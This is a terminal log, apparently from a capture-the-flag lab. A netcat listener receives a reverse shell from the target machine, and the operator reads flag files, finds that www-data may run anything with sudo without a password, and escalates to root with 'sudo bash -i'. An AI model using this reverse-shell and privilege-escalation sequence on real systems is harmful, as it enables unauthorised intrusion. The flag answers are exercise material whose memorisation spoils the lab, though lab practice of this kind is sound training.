└─$ nc -lvnp 3333
listening on [any] 3333 ...
connect to [10.8.78.245] from (UNKNOWN) [10.10.76.140] 48366
$ cd /home
$ ls
rick  ubuntu
$ cd rick
$ ls
second ingredients
$ cat "second ingredients"
1 jerry tear
$ cd /root
$ ls
3rd.txt snap
$cat 3rd.txt
$ sudo  -l
Matching Defaults entries for www-data on
    ip-10-10-76-140.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
        ip-10-10-76-140.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
$ sudo bash -i
sudo bash -i
root@ip-10-10-76-140:/var/www/html# cd /root
cd /root
root@ip-10-10-76-140:~# ls
ls
3rd.txt  snap
root@ip-10-10-76-140:~# cat 3rd.txt
cat 3rd.txt
3rd ingredients: fleeb juice